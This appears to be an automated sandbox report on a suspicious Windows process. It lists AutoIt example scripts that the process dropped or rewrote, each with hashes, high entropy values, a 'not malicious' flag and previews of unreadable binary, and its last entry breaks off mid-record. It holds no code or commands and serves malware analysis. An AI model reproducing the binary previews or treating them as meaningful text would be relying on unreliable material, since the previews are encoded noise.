                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.o3.w'.$9.Z...q...N......q.,8y....t...h..a...(.0..-....h...I.xE.... ..../.....6k.I4.k gi..;.4..SdJ.Ih..)...-.).A.%...I._...1:q.........[/..z..z.RuFs..f..l..b+x...U..b........=..L.u...JE$jz.s.1...H.vk.<.9S..6..=.....%)T<.."F.....V.%.T.......o....?...>.Ni,.jH.*..Xv....N...9_K.z..I...b`...9...1d.&..'.D.?nz......(..|D.6...z.9.G!..X.......Q#...#.r.=......yH.....p..&..a...S.S....f..u......$.F# .s>*...Z.S:..z .Cr..d.V..6._....#..C.U~..:H.n..&...z.g.-}9...I-..-..$.Q.f>..W9..sg!.:\...t,...}O...n.r....i....1..........l/..1C.P...QL~..a.Nj...*.x.4,...O....^..=..a.`..a.&.&...-....cqO'....f.X.!..............t...".....-.._T;..j...h..C.d6....?.#..R..K-I....E.:.s...T]..?..U...b.-v05..SXc...{......A0..&4*..6v.a..._,KO.(...n..w...F.st.6A...p6\^/..l.].h`4..... .|.3.;.......i=Y.R..........Vq...G...Q6p8N.-B.......3.........N..-9.8:.XC.~.J...Xq...U....u*..m`|}...?..gm./.^21-.m...........VD...u..&s.nx].![.s..k...........0..~e......f_@.......6Wx.m.@..N.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\ObjEvent[2].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1512
                                                                                                                                                                                                                                                Entropy (8bit):7.859605034483846
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:7r1I6fqil2wFERaX8AlNcaEtfRRvjmJrc0YXUZtwsTWhc:7BIo2wFE4XzLcbfrL4o0jZtwy
                                                                                                                                                                                                                                                MD5:F661EDC9628E59899B23DDBBCAB655B1
                                                                                                                                                                                                                                                SHA1:B06CADECF70F6CCA714D03C66995487F226B4D85
                                                                                                                                                                                                                                                SHA-256:11170F0E0AAA59C306E9CFF565ABBCF5E996CA2715EC7D78D4E65841244F842C
                                                                                                                                                                                                                                                SHA-512:F079FD8799A66964D0055E54A526467E91F0C4F35428D0F1F6BAE8A0BF1CB1F6F9E4AD7F822A049E976451EF30B12BF343EB610A1F414B868CAAB573EFE4034E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:U..../&}5.p.......sEG4~8.Hh_..x.:..i%.>IZ..$...e.i..kN.*........)..T...B.g_..$..y?....D...]K|`.t.&...z..-...*^w/).o]K.?..'........5.L....V..7"......@..].. ..h.,k..y.CJ..^h..F./j.d%....k.......A.m..A....o..d4..Z.or..H...1....N~^....G.l.K8.Y)....w.t.....(.*G..Q.....5,....x.\....Ayv.....&.g.r..f......+.7......10...%.<...^...#.n.O.9K.L..~.@...fN.E@.J|._..&..^...C...~u...+.{......'^d.#....".>..........M.&<.....=...ds..../v..S{..;`....].K..`.I-.z..t.n..f.....B.,..DS.`...L......}.Y.......44..e....Jn.@MP0{.E.n.......(....L..a:.Gs..kA'..nq..m..>.%...x.......;|..>.1.....5.J+.DqW..........fv......7G....?.u!IZO..>..x.wm.....Ib..`..>y.I}.m].....=.A..6L..(.7.a.....f_\...&.,...9...C...|..3s.......U...Q...7U......|..6.. ....D..;....0....H....iY|....F;.H...EK.....K9....BQ..ld..+...`.l..~..6..cW.k9....s.i.v.em_.tN7C..B....M.[ .<$F..`.s.4+.[..W.......^...`....>.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\ObjGet.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1160
                                                                                                                                                                                                                                                Entropy (8bit):7.820581805853838
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:X+Vkj6JiYmAhHOAWTLzKbBywgTCoWYFXAMUabfKjaGJYIsS+WwgHIc0jmksXU4HH:X+H/BWTLMTOlyjmJrc0YXUZtwsTKAc
                                                                                                                                                                                                                                                MD5:C5D31DF7B81356EC9E5EE5C690747704
                                                                                                                                                                                                                                                SHA1:D43BC9ED28307B5200404E89CA98216BA8E1E435
                                                                                                                                                                                                                                                SHA-256:A27A29673F0E47804D6678DB7D770C2154272BF87588A1EF5DA53B0BC510CF48
                                                                                                                                                                                                                                                SHA-512:03DBFC842A33DC8A8559F18AC6445F6B488B2E48B3B6F67700C2DF90F0218ACFB89D33CD051409E2743544112EDB77181BD8D3A7417A67DB619B1BC1044A8AF7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:T.aC.X@....+L...s#.W.KO..O..(.I.....]..".....|... .![..CdV...y7...F..S.I.......>.&..e..@.G....&%.`2..v..-|.......?.V...Q.~w...B..;#..e..kZP..{GU..O.'f.E.O.......'...{....m.Yd.m.l.|....^[.t.....=..|i....sq(..7(Dq*..._.fH.a..q.e'.-..H.l...{.s..q..G..&.........j.........s.}....].,B...].......}.I....k.....u..*R....8.P....K.5t....kf_n.:.*..`.....5>..N!.|.....@....Dy..T..].'..6bMZ..K.._.X....O..S.;.f......H...{.8..{......\....Gx.DRHsU:..8x..oKuP@...&...J...y.-...q.G.,=.I...S}.1....Q..$.d....E.~n..[./..^}.&...r..X.w.:...<...@.]....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\ObjGet[2].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2024
                                                                                                                                                                                                                                                Entropy (8bit):7.9040677614826915
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:kk5Xeiqfulg5Il2DJap7neH/65nObMk8X4o0jZtw2:kwqfulIESY7pl0le2
                                                                                                                                                                                                                                                MD5:6D1C08BEEC08606700C204879CF468EB
                                                                                                                                                                                                                                                SHA1:FFA61D07D7669F678902E87D95A6CB8BCDB63D33
                                                                                                                                                                                                                                                SHA-256:8F219959F3A8825C5CA78B2A217B9E6F10DA52B986A12C064ABDB4FF9818C17D
                                                                                                                                                                                                                                                SHA-512:69B331C38F5AECB389FB04F1344EF260A81259010866980706FC257C7384630751415791B3C8E806481CE8E09E55806900E5E6620570E2A99DBDFA49F4EC87E8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..dt.B+L.,\...\........Q.6..qt.Ns.3..T...Z.QD....'.C.x.WH.!.pp.3/]nn.....{....NZJ..$k.Hx4.. .~Ugj...k../...l.\..q.o.....K..0.]...#.3.Y.p...?. I>.+...X...e..I.h#.m_|j......l.ej....~..u.....L..x,...7.U=..B.V1srI..9]k...XX,.E..9I.U....b......+.{..3.6Uh<7J...Q..P=_.....r.-p...T....r..UZ4.3.E..u.S...(.#$3.h-....M`m.`W6lsn..w....[..qa.@H.6(..h.2B}..V.cpoc..........!I.*>..&....l.A+)..Y*;..[.%"jC.Rv!.E.......g}....S.-..L...Q...q...7z(<...D...aD-[.-.h*......./.^a.W.y.C........o..H...~........kbL...w..Z{/.,.........?...e.(i.o.9..U.....%...&M.Wn.P9...o;.w(.EO.%V}y..-.,.....L...)q..~[E.2.4u..\z.!.....uN...B...\./..6.hc.=.........#.o0.X...E.....N+J,/...b....4...y]$.;.[.5..J.*.}....M.Tn...e....zP.=i.?....C*.k...K......F[.G`.v..T@l&P....y[i.r...W....l.+.Lm..c-.x.......|..gd.....\....JG..zDk.....Dze."i.F ....tx....`......V...........0...!.[..% ..x....d.......r9.nCLp.h,..<.....<..|.x4.'<.UP...*c.....d{M.).[z;.x...5.........0...n........<....3.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\ObjName.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1479
                                                                                                                                                                                                                                                Entropy (8bit):7.865538669192979
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:ibNSAS1ELzIQfWXiGNKWwfX6FvXIWSfuCCdTNQYJ8vN3GCjmJrc0YXUZtwsTijy:cNSASMUrBN3sSvYWS5ClcvBP4o0jZtw8
                                                                                                                                                                                                                                                MD5:C8025EE51489B2E14C6A5C47E6776F50
                                                                                                                                                                                                                                                SHA1:6EB0CBC68D4C05D71694D4A16203DD6B2DE68D52
                                                                                                                                                                                                                                                SHA-256:071E02F0B7775EEE09ABDF778E2151BEC0E7FD260D472B92B3B585C082C0073D
                                                                                                                                                                                                                                                SHA-512:0FA8B2609E63040DEF3705CDDAAEE2815C12E38DF97DE3832F4686AC7D61454725C5CC36F4EDD2A6D7794AB2488B9A00F31629B1F112C893B4E7EB1A75F4CD02
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...4S?k...7P#.j..YE..."X.3.a...q.....uUhU.9.m/n<.....i/6.Bh..+O)D.s..W^...&.%..@.......J...9&<.....3..l.... .HK.T..<v<.DdQ.b.]Y.u.O.c...m.#.w...........1%.y.Hp.CMo........=..q...`,,PC;....!...)...M0.....gc.aP$_V`.].<.7N.93..ji..|.@..6sg].e...$..F..b<~.\.'..U..l.s.....E.... p....4....Q5.p.hWP.G...H...<......i_.P.9......$.X=$.p..h_.xS.2C...#...PQ.....d.K3..N.~.T....z%~..Fz...=nN..|.q.d...q.C..a...V...7N?.-......A.j#@.K.#....y6F..-M_.'..E.Bz@.T...N.h.O.D..z..<...].`./.d.$.(7..d6....S...D..9.1..hr.TjV.z..........n....R6.F%.....N._....r.3.. 73...l#.X.?"...'.K.!.1..L)n.8Q...Z}...\..#.....aq.:#...Je.....?.0.a'CJ..9....+...T.Q....o"...pF.7.d...e.S..1..1.^.a....:0...S...i., .........}%...<|?.>..RL...... $"R...X6.c.~.x....enM-3.....D.?.;.{..Pf..8%..u?.."./....f......w..2...W..@UFf.g.i.g......(...O........36'..w..{C....Z.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\ObjName[2].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2410
                                                                                                                                                                                                                                                Entropy (8bit):7.923176099769602
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:wYHqQt83SnFJ56fDU8ZbYfyUd6uykON0BcHxBzbi4o0jZtwdc:wYHmCFb6LnZFUd3RON0q/rleC
                                                                                                                                                                                                                                                MD5:98A492337D29983F26C2DD894FCFD022
                                                                                                                                                                                                                                                SHA1:D2E6797543B6AACD73C71D820ED4D593553F9A66
                                                                                                                                                                                                                                                SHA-256:0207773BCAA822BFC66AE79446364069308EA2A91AD619C610B47B2C89690EE1
                                                                                                                                                                                                                                                SHA-512:51C3B8316B58F6746ADCE268C9750FD63C461493D101630BB607443D38EC1057D448AA0244C62E2B6DED3F2262D916238E69403705C5E3677C519EADCCB996AA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....^.$C.....4.M5.e.p..F..c.......Vv.....;..L.B.i...*gqZ..a.V.|......'.(....T -e.6J.`..`u..&3\.._......~.O...x.>......cb..U....V..0n......LOnj.....-....$.Q.M...=.E....G._..@~b..".\N....P.n=...K.l.S.n?..'WaI.]..........'+...-....^Q.@[_...A......1(.2......Ht.X..R.*.s.l.<b........8.5.@.R........u:...H..".m...NY...mvI*..zt".Ct.[* .hLB_.m.G..O.8.B.3ko.B.3Q.j...m.|.........k.....\.-|Ine..Y.m.....g.`L.2.TU^}.p...GW.4..(.p.s;...u.aGi.z..*..Gz.08.....qOdo....w.m.E^\"..[.*....C....oF-_$...i...:.D..4....>.@>`......i.'g..x.<.!...Q...t7YT...`Pj.L.%}`E..:.{EK.K2...QW..Nu/...6..bj_.....p.x..h..;..bg....v...b3}._..v5@.a2...D.g...x>0r..../.O......6&p..J.u......v...=.+./.M]"...Y..pl..<...THT=..?.W.viR...>JXY..+........TC..{.(...O..|..~ .9..k.....z.....L\.S..PJ....I;.nG Ty[...!....V...l...c...d;b...bb...F.~.x&....d. ......0EY.....o0....Q.N....G.. .CK..8. e....%..,...d...tY...n..4.{..........X...6.g.R.8tv......1Ol.E..R..5`..Y.)i...<...N8.K.q}..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\OnAutoItExitRegister.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):982
                                                                                                                                                                                                                                                Entropy (8bit):7.78394135000416
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:mznVK1e8pvm/Joqq8e8qOa26gEzr6kwKjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJf:AVeNvmhoqTYOQQhKjmJrc0YXUZtwsTd
                                                                                                                                                                                                                                                MD5:B978929E6D763B2E23C92AC4BF47ADBA
                                                                                                                                                                                                                                                SHA1:004DA55B2B86B9E088DE194E910D1E0D62EA42C0
                                                                                                                                                                                                                                                SHA-256:BFBF548F673415EDED2DF54AB6EB7143A3A309CBC7B9D412C00687D7B3D91B43
                                                                                                                                                                                                                                                SHA-512:36165A79414DF7D6A9E15D6C1BA472F56B426FB0B3B03F4343284C12F3A2B129C5E9E4B87A5C5066CE04AB67D907D741C54205B0555AAC5ECFBABB43FA0358DC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.@$.._\<s.B.P...y...........d.c...$J..8...q...j.[o..$.9'.uB.lL.u....(....../....C.#.:.)Ke...O.).....z......h[.n8{[..A..p~.X...#~>.......]1B.....q.O...8[....0.Y..5.2=/..M....Wb;._.^B.n.N....,...$..D.2..M.O..Mu...?E.?r.0...9......x..l..c@_Kf!..P..!2(.v....1....I....C.LS..sx.])%..B....[..R.....9......$......C.MF0EN,.....T.......c)..E.cn.-r.;...!.@'V.9..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$. ......"H.. A....~....p||..1..f8v...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\OnAutoItExitUnRegister.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1022
                                                                                                                                                                                                                                                Entropy (8bit):7.809240796449972
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:5Erm3KGoiJUXkMcZYBi9jmJrc0YXUZtwsTAPMy:5E9ilGiF4o0jZtwqy
                                                                                                                                                                                                                                                MD5:42DEF7E14C12A414632105918F59DC36
                                                                                                                                                                                                                                                SHA1:B1A2D7D9A09685ACAFF9EE7AF39D27BF33E5C605
                                                                                                                                                                                                                                                SHA-256:86EAC6707FC24AE71177F51189E54F0A293A7713A12DE287A41C316F5E2AD677
                                                                                                                                                                                                                                                SHA-512:9CD5F5505957711425033AD2452782F9CDFFC203E4A410438347EC8532BCC36C9E50394A284BD18DB3C4F9C51EF0114DF7779B00716C4ADA382F7A74588ADA06
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:b....l?q...%_.P.8mbByx1..c.d*}...*.(....`Y..r.......O....CF.t'...h...g.(2....}.9t..S#/.3......[...;]x.7a.. ....\...RF.A..f....a..f.d..7.g........%Q..,O...<.QX7.....=..!>...F./.~..cz..J....9...*E.(....bd....o..9..A..x.._..g.zlG.X%..<<..2hP....]..Eo2.4iE.r...;..si...|*+.~Ew.]+..1.....-.}%.Rj...O..).V'.}k...{..8.>..r.+...?.E..7/......Q...P...P..,...M.-.{...1........B...........%;....V.e.~:,@...._........\.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$....B. ..'.|0.#/.f.?'.8Y,0.....e.J..k......

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\OnAutoItStartRegister.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1022
                                                                                                                                                                                                                                                Entropy (8bit):7.779441638516579
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:vLLr1vAKXwH/Jv8DiFCwrDjmJrc0YXUZtwsT5uy:3r15wBNH4o0jZtwxy
                                                                                                                                                                                                                                                MD5:6B67923DA01F29027A2585E5BECA9224
                                                                                                                                                                                                                                                SHA1:93440BD353CDDE8A5C2EEC0CB038A9766B126F68
                                                                                                                                                                                                                                                SHA-256:E29D6D6C9CA291D58E865C2197C76CD8011C4C5A62C5BC07BC4B733E63B35EF9
                                                                                                                                                                                                                                                SHA-512:25BE57D44028A4AA6E764F81B6641E616414D66E793F0E1A854B9B5DA26DFBB6A8E8E53708357EA3D9C701A72215235B7C82B89E9558545228849AC9AB15BA00
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.....i.i.7Q.{.S.f.......k..Z..f..Q..J..C...Lf.o...L.c$.cC.. <G..I"R.R.w...%:e...Ul.3w!...b.!....y.E.q.c...:d.U..".+....._Pm.e....Z....j..|...B.?..*v......8..X6..o....O..P:M..B.?.q<.f.....t...I......O..[...._.Z...d.jC...k]!.......?....N......vG"q..z.L..."^.5,.....KQ:S...&...o..p....F.cO...8UR.j...-f..}.:>.....so.#..r....W..Y..n..$7......{>...F.._.B.....D...^.f~.{..U....41.CQ..1....#..9o.!Y...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..M...<..;<.!..9....S(...-".Y...........

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Ping.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1066
                                                                                                                                                                                                                                                Entropy (8bit):7.792308677707224
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:YqCcESPX18lah0A4N02ahDHR1j2jmJrc0YXUZtwsT+e:YqCcnf18Yh0A4QDH3jI4o0jZtwi
                                                                                                                                                                                                                                                MD5:FD989B5EAAEC1BA5EB65D9B98403A870
                                                                                                                                                                                                                                                SHA1:F141485010DC4DF24EE4C37F988BDD43330BC88E
                                                                                                                                                                                                                                                SHA-256:0A869C1E751F805BBDB4D8A786ABF5814C1A3B9E6B0038FD22C1C1A94A14C40C
                                                                                                                                                                                                                                                SHA-512:1270C20CE026A530DD8113A159186B6197D3558D7987623325562A2FE8A6F41E83A8DE6798A89C7936BA760304EF8FAF9B514DF88B24311CCDABC51350A5429A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..7.w.#....j.....e&..l.XFx.0.....E).E....L&...^.y..M,.+?.....>.........;S.v...P.7.A.......h...S[.]oY\0..r.!. ....Q....z.T~Y$...b/:.-z.`$o.:..LObR..S.!.S..Q.@N.wk..wW.F-q.)......A....[$ .B.T[S..I.+S.....H..JX..w....^.......nf.a...n..X..me.G.@.J...s.......h~Bk...oA+...9z.S._.h.H..nC.....q...8.Q.........S..T.-6-.W...x..,....}...D....x.{......MD.Y.M......^'.F..k....=.+Q."wNA.W.......uM.]..6.l.R[1.c....1...Z.VG.W.S.....yQC]*.)..[..{..>.|.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\PixelChecksum.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:DOS executable (COM, 0x8C-variant)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1002
                                                                                                                                                                                                                                                Entropy (8bit):7.780561919421121
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:CFCpriP6x4kXn3AM2jmJrc0YXUZtwsTYf:CQpriP69QMI4o0jZtwJf
                                                                                                                                                                                                                                                MD5:A19B3919D1DC434561234F41DE22926D
                                                                                                                                                                                                                                                SHA1:A0BFAA74B701BFBC643D0DC823563822087C9E66
                                                                                                                                                                                                                                                SHA-256:853B864F5E3E4D9DBC8D4429DB45BF8DC2FCFCB1359630DFA8EB762E7E150754
                                                                                                                                                                                                                                                SHA-512:CF5A8778542A81243E65E875F787FBD21F8044F556008F447C8EB94AE950E50492976C1FD6FF22D2A564DC51FE2CF5C6193F451DA4492B367C0125A56B80F3DF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.P{.....(......D/.....0............|.[...<..@..%y...4{.;UFcG<...Q. .....X[..<$...?..I%.Cy.p...<.S.A...i.!.....S ..*.....x..<...}sp\X..J:..Us.......D._.P..9.."9.*....%.!...U..3w...K.u.7.*........a7.e....%.}S#]o...j..e.e ..b......,=.A.@-H.v.A.C....fIZ....czy..\.w...rJ.p....D.......{.!^.r..D<.].Y.I3#.......^....}.......E......l.p.K@...8..4&V..'..n...zD.{...l>..>.......^..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..xx..fN...(..\.....~.E..oC..j`-.h?z....................fk.W..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\PixelGetColor.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):818
                                                                                                                                                                                                                                                Entropy (8bit):7.687729853276957
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:+cTSJzwyz2Fi1rPwYZXbDjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1i:+cTSSyz8czZfjmJrc0YXUZtwsT6iUv
                                                                                                                                                                                                                                                MD5:3F397AD6CC2A8A901889175051B17AAC
                                                                                                                                                                                                                                                SHA1:8131B20C92B5346A321114E7BBFA423A023519E7
                                                                                                                                                                                                                                                SHA-256:0E78CEAC3F6C83D3F8A71AF3B2710DC1F516C58A531DE80E9C31851BCD3BC75A
                                                                                                                                                                                                                                                SHA-512:52272558D7827D470BE2E1D6DFDFEC850C303CE58FA1EC457D916C7305925DC841A4854A2C5A3369A06DBA84986A900E3A58EAB28DCD422AFD55BA1249168A58
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:z5.H..5...N.E...~I.Y..G....Ty..+.aw..t..d........v.6.}W3...#..?Y.Nl.....j..3.z$.`..W..=##II.:^]....Z^%...}........q.}#XdH..Z`..s.@\7.....k...B2.....[..s.*..*..i...>..5takr..XWq....=..w.8..........U'. .g.Ozf.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.*.1$.FQ.[`0*..XB.)d....Az.._..T;......................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\PixelSearch.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
